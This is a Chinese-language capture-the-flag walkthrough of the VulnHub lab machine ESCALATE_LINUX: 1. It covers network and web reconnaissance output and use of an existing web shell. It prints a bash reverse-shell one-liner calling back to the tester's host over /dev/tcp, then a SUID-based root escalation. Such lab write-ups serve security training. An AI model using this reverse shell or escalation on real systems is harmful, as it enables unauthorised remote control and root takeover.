红队打靶练习:ESCALATE_LINUX: 1

2023-12-21 17:51:14

信息收集

1、arp
┌──(root?ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.12.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.12.1    00:50:56:c0:00:08       VMware, Inc.
192.168.12.2    00:50:56:ec:d1:ca       VMware, Inc.
192.168.12.140  00:50:56:24:79:77       VMware, Inc.
192.168.12.254  00:50:56:ea:3b:29       VMware, Inc.

6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.365 seconds (108.25 hosts/sec). 4 responded

2、netdiscover
netdiscover -r 192.168.12.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts

 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.12.1    00:50:56:c0:00:08      1      60  VMware, Inc.
 192.168.12.2    00:50:56:ec:d1:ca      1      60  VMware, Inc.
 192.168.12.140  00:50:56:24:79:77      1      60  VMware, Inc.
 192.168.12.254  00:50:56:ea:3b:29      1      60  VMware, Inc.


3、nmap
主机存活探测

┌──(root?ru)-[~/kali]
└─# nmap -sn 192.168.12.0/24 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-19 16:34 CST
Nmap scan report for 192.168.12.1
Host is up (0.0053s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.12.2
Host is up (0.000052s latency).
MAC Address: 00:50:56:EC:D1:CA (VMware)
Nmap scan report for 192.168.12.140
Host is up (0.000049s latency).
MAC Address: 00:50:56:24:79:77 (VMware)
Nmap scan report for 192.168.12.254
Host is up (0.00012s latency).
MAC Address: 00:50:56:EA:3B:29 (VMware)
Nmap scan report for 192.168.12.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 4.41 seconds


端口探测

┌──(root?ru)-[~/kali]
└─# nmap -p- 192.168.12.140 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-19 16:35 CST
Nmap scan report for 192.168.12.140
Host is up (0.0013s latency).
Not shown: 65526 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
2049/tcp  open  nfs
36591/tcp open  unknown
40519/tcp open  unknown
53585/tcp open  unknown
56347/tcp open  unknown
MAC Address: 00:50:56:24:79:77 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 7.43 seconds

┌──(root?ru)-[~/kali]
└─# cat port.nmap | head -n 14 | tail -n 9 | awk -F "/" '{print($1)}' | xargs -n 9 | sed 's/ /,/g'
80,111,139,445,2049,36591,40519,53585,56347


信息收集

 ┌──(root?ru)-[~/kali]
└─# nmap -sC -sV -sT -T5 -A -O -PN -p 80,111,139,445,2049,36591,40519,53585,56347 192.168.12.140 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-19 16:40 CST
Nmap scan report for 192.168.12.140
Host is up (0.00030s latency).

PORT      STATE SERVICE     VERSION
80/tcp    open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      35483/udp6  mountd
|   100005  1,2,3      53357/tcp6  mountd
|   100005  1,2,3      53585/tcp   mountd
|   100005  1,2,3      59650/udp   mountd
|   100021  1,3,4      34657/tcp6  nlockmgr
|   100021  1,3,4      40519/tcp   nlockmgr
|   100021  1,3,4      45296/udp6  nlockmgr
|   100021  1,3,4      54711/udp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
2049/tcp  open  nfs         3-4 (RPC #100003)
36591/tcp open  mountd      1-3 (RPC #100005)
40519/tcp open  nlockmgr    1-4 (RPC #100021)
53585/tcp open  mountd      1-3 (RPC #100005)
56347/tcp open  mountd      1-3 (RPC #100005)
MAC Address: 00:50:56:24:79:77 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: LINUX

Host script results:
| smb2-time:
|   date: 2023-12-19T08:41:05
|_  start_date: N/A
|_nbstat: NetBIOS name: LINUX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 1h39m59s, deviation: 2h53m12s, median: 0s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: osboxes
|   NetBIOS computer name: LINUX\x00
|   Domain name: \x00
|   FQDN: osboxes
|_  System time: 2023-12-19T03:41:05-05:00

TRACEROUTE
HOP RTT     ADDRESS
1   0.30 ms 192.168.12.140

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.77 seconds


漏洞探测

┌──(root?ru)-[~/kali]
└─# nmap --script=vuln -p 80,111,139,445,2049,36591,40519,53585,56347
192.168.12.140 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-19 16:49 CST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.12.140
Host is up (0.00012s latency).

PORT      STATE SERVICE
80/tcp    open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
2049/tcp  open  nfs
36591/tcp open  unknown
40519/tcp open  unknown
53585/tcp open  unknown
56347/tcp open  unknown
MAC Address: 00:50:56:24:79:77 (VMware)

Host script results:
|_smb-vuln-ms10-061: false
|_smb-vuln-ms10-054: false
| smb-vuln-regsvc-dos:
|   VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
|     State: VULNERABLE
|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|       while working on smb-enum-sessions.
|_

Nmap done: 1 IP address (1 host up) scanned in 67.60 seconds


4、nikto
┌──(root?ru)-[~/kali]
└─# nikto -h 192.168.12.140
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.12.140
+ Target Hostname:    192.168.12.140
+ Target Port:        80
+ Start Time:         2023-12-19 16:49:53 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 58a84b35a8d4e, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2023-12-19 16:50:08 (GMT8) (15 seconds)
---------------------------------------------------------------------------

5、whatweb
┌──(root?ru)-[~/kali]
└─# whatweb -v http://192.168.12.140
WhatWeb report for http://192.168.12.140
Status    : 200 OK
Title     : Apache2 Ubuntu Default Page: It works
IP        : 192.168.12.140
Country   : RESERVED, ZZ

Summary   : Apache[2.4.29], HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)]

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and
        maintain an open-source HTTP server for modern operating
        systems including UNIX and Windows NT. The goal of this
        project is to provide a secure, efficient and extensible
        server that provides HTTP services in sync with the current
        HTTP standards.

        Version      : 2.4.29 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        OS           : Ubuntu Linux
        String       : Apache/2.4.29 (Ubuntu) (from server string)

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Tue, 19 Dec 2023 08:53:50 GMT
        Server: Apache/2.4.29 (Ubuntu)
        Last-Modified: Tue, 04 Jun 2019 19:43:52 GMT
        ETag: "2aa6-58a84b35a8d4e-gzip"
        Accept-Ranges: bytes
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 3138
        Connection: close
        Content-Type: text/html

目录探测

1、gobuster
┌──(root?ru)-[~/kali]
└─# gobuster dir -u http://192.168.12.140 -x php,txt,bak,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.12.140
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,bak,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 293]
/index.html           (Status: 200) [Size: 10918]
/.html                (Status: 403) [Size: 294]
/shell.php            (Status: 200) [Size: 29]
/.php                 (Status: 403) [Size: 293]
/.html                (Status: 403) [Size: 294]
/server-status        (Status: 403) [Size: 302]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================

2、dirsearch
┌──(root?ru)-[~/kali]
└─# dirsearch -u http://192.168.12.140 -e*
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594

Output File: /root/kali/reports/http_192.168.12.140/_23-12-19_16-55-42.txt

Target: http://192.168.12.140/

[16:55:42] Starting:
[16:55:43] 403 -  300B  - /.ht_wsr.txt
[16:55:43] 403 -  303B  - /.htaccess.bak1
[16:55:43] 403 -  303B  - /.htaccess.orig
[16:55:43] 403 -  305B  - /.htaccess.sample
[16:55:43] 403 -  303B  - /.htaccess.save
[16:55:43] 403 -  301B  - /.htaccessBAK
[16:55:43] 403 -  304B  - /.htaccess_extra
[16:55:43] 403 -  302B  - /.htaccessOLD2
[16:55:43] 403 -  301B  - /.htaccess_sc
[16:55:43] 403 -  301B  - /.htaccessOLD
[16:55:43] 403 -  303B  - /.htaccess_orig
[16:55:43] 403 -  294B  - /.html
[16:55:43] 403 -  303B  - /.htpasswd_test
[16:55:43] 403 -  300B  - /.httr-oauth
[16:55:43] 403 -  293B  - /.htm
[16:55:43] 403 -  299B  - /.htpasswds
[16:55:44] 403 -  293B  - /.php
[16:56:15] 403 -  302B  - /server-status
[16:56:15] 403 -  303B  - /server-status/
[16:56:16] 200 -   29B  - /shell.php

WEB


传参cmd来获取信息!

反弹shell


payload

/bin/bash -c 'bash -i >&/dev/tcp/192.168.12.128/5656 0>&1'


提权

?user6??/??home??user3??find / -perm -u=s -type f 2>/dev/null
<ind / -perm -u=s -type f 2>/dev/null
<ind / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/sbin/mount.ecryptfs_private
/sbin/mount.cifs
/usr/sbin/pppd
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/traceroute6.iputils
/usr/bin/chfn
/usr/bin/arping
/usr/bin/newgrp
/usr/bin/sudo
/usr/lib/xorg/Xorg.wrap
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/ping
/bin/su
/bin/ntfs-3g
/bin/mount
/bin/umount
/bin/fusermount
/home/user5/script
/home/user3/shell

 user6  /  home  cd user3
cd user3

 user6  /  home  user3  ls -al
ls -al

total 160
drwxr-xr-x 22 user3 user3 4096 Jun  4  2019 .
drwxr-xr-x 10 root  root  4096 Jun  5  2019 ..
-rw-r--r--  1 user3 user3  124 Jun  4  2019 .asoundrc
-rw-r--r--  1 user3 user3   95 Jun  4  2019 .bash_history
-rw-r--r--  1 user3 user3  220 Jun  4  2019 .bash_logout
-rw-r--r--  1 user3 user3  949 Jun  4  2019 .bashrc
drwxr-xr-x 15 user3 user3 4096 Jun  4  2019 .cache
drwxr-xr-x 20 user3 user3 4096 Jun  4  2019 .config
drwxr-xr-x  3 user3 user3 4096 Jun  4  2019 .dbus
drwxr-xr-x  2 user3 user3 4096 Jun  4  2019 Desktop
-rw-r--r--  1 user3 user3   23 Jun  4  2019 .dmrc
drwxr-xr-x  2 user3 user3 4096 Jun  4  2019 Documents
drwxr-xr-x  2 user3 user3 4096 Jun  4  2019 Downloads
-rw-r--r--  1 user3 user3 9354 Jun  4  2019 .face
drwxr-xr-x  2 user3 user3 4096 Jun  4  2019 .gconf
drwxr-xr-x 24 user3 user3 4096 Jun  4  2019 .gimp-2.8
-rw-r--r--  1 user3 user3    0 Jun  4  2019 .gksu.lock
drwxr-xr-x  3 user3 user3 4096 Jun  4  2019 .gnome
drwxr-xr-x  3 user3 user3 4096 Jun  4  2019 .gnome2
drwxr-xr-x  3 user3 user3 4096 Jun  4  2019 .gnupg
-rw-r--r--  1 user3 user3   20 Jun  4  2019 .gtk-bookmarks
-rw-r--r--  1 user3 user3  105 Jun  4  2019 .gtkrc-2.0
-rw-------  1 user3 user3 4710 Jun  4  2019 .ICEauthority
drwxr-xr-x  3 user3 user3 4096 Jun  4  2019 .local
drwxr-xr-x  5 user3 user3 4096 Jun  4  2019 .mozilla
drwxr-xr-x  2 user3 user3 4096 Jun  4  2019 Music
drwxr-xr-x  2 user3 user3 4096 Jun  4  2019 Pictures
-rw-r--r--  1 user3 user3  873 Jun  4  2019 .profile
drwxr-xr-x  2 user3 user3 4096 Jun  4  2019 Public
-rwxr-xrwx  1 root  root    33 Jun  4  2019 .script.sh
-rwsr-xr-x  1 root  root  8392 Jun  4  2019 shell
-rw-r--r--  1 user3 user3    0 Jun  4  2019 .sudo_as_admin_successful
drwxr-xr-x  2 user3 user3 4096 Jun  4  2019 Templates
drwxr-xr-x  3 user3 user3 4096 Jun  4  2019 .thumbnails
drwxr-xr-x  4 user3 user3 4096 Jun  4  2019 .thunderbird
drwxr-xr-x  2 user3 user3 4096 Jun  4  2019 Videos
-rw-r--r--  1 user3 user3   50 Jun  4  2019 .Xauthority

 user6  /  home  user3  ./shell
./shell
You Can't Find Me
Welcome to Linux Lite 4.4 user6

Tuesday 19 December 2023, 05:19:27
Memory Usage: 334/985MB (33.91%)
Disk Usage: 5/217GB (3%)
Support - https://www.linuxliteos.com/forums/ (Right click, Open Link)

 root  /  home  user3  id
id
uid=0(root) gid=0(root) groups=0(root),1005(user6)

我们这里直接执行就提权了!我觉得应该还有很多种提权方法!可以去参考一下博主!大概有十多种提权方法,本靶机主要就是练习linux提权的!

工具 : https://blog.csdn.net/bwlab/article/details/121045674

转发:

vulnhub Linux提权靶机 | escalate_linux_1 | tari Blog咕咕了很久的提权靶机(icon-default.png?t=N7T8https://tari.moe/p/2022/escalate-linux-1?_sw-precache=65fa1d960db1340738052bf3d9943516

文章来源:https://blog.csdn.net/rx3225968517/article/details/135092581
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。